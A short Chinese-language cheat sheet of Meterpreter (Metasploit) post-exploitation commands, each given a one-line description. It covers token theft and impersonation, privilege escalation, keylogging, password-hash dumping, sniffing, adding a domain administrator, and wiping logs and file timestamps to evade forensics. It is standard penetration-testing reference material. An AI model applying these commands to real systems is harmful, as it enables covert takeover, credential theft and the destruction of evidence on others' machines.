meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。
常见的meterpreter命令
- run scriptname 运行Meterpreter脚本,在scripts/meterpreter目录下可查看所有的脚本名。
- sysinfo 列出受控主机的系统信息。
- ls 列出目标主机的文件和文件夹信息。
- use priv 加载特权提升扩展模块,来扩展Meterpreter库。
- ps 显示所有运行进程以及关联的用户账号。
- migrate PID 迁移到一个指定的进程ID(PID可通过ps从目标主机上获得)。
- use incognito 加载incognito功能(用来盗窃目标主机的令牌或是假冒用户).
- list_tokens -u 列出目标主机用户的可用令牌。
- list_tokens -g 列出目标主机用户组的可用令牌。
- impersonate_token DOMAIN_NAME\\USERNAME 假冒目标主机上的可用令牌。
- steal_token PID 盗窃给定进程的可用令牌并进行令牌假冒。
- drop_token 停止假冒当前令牌。
- getsystem 通过各种攻击向量来提升系统用户权限。
- shell 以所有可用令牌来运行一个交互的shell。
- execute -f cmd.exe -i 执行cmd.exe命令并进行交互。
- execute -f cmd.exe -i -t 以所有可用的令牌来执行cmd命令。
- execute -f cmd.exe -i -H -t 以所有可用的令牌来执行cmd命令并隐藏该进程。
- rev2self 回到控制目标主机的初始化用户账号下。
- reg command 在目标主机注册表中进行交互,创建,删除,查询等操作。
- setdesktop number 切换到另一个用户界面(该功能基于哪些用户已登录)。
- screenshot 对目标主机的屏幕进行截图。
- upload file 向目标主机上传文件
- download file 从目标主机下载文件。
- keyscan_start 针对远程目标主机开启键盘记录功能。
- keyscan_dump 存储目标主机上捕获的键盘记录。
- keyscan_stop 停止针对目标主机的键盘记录功能。
- getprivs 尽可能多的获取目标主机上的特权。
- uictl enable keyboard/mouse 接管目标主机的键盘和鼠标。
- background 将你当前的Meterpreter shell转为后台执行。
- hashdump 导出目标主机中的口令哈希值。
- use sniffer 加载嗅探模块。
- sniffer_interfaces 列出目标主机所有开放的网络接口。
- sniffer_dump interfaceID pcapname 在目标主机上启动嗅探。
- sniffer_stats interfaceID 获取正在实施嗅探网络接口的统计数据。
- sniffer_start interfaceID packet-buffer 在目标主机上针对特定范围的数据包缓冲区启动嗅探。
- sniffer_stop interfaceID 停止嗅探。
- add_user username password -h ip 在远程目标主机上添加一个用户。
- add_group_user "Domain Admins" username -h ip 将用户添加到目标主机的域管理员组中。
- clearev 清除目标主机上的日志记录。
- timestomp 修改文件属性,例如修改文件的创建时间(反取证调查)。
- reboot 重启目标主机。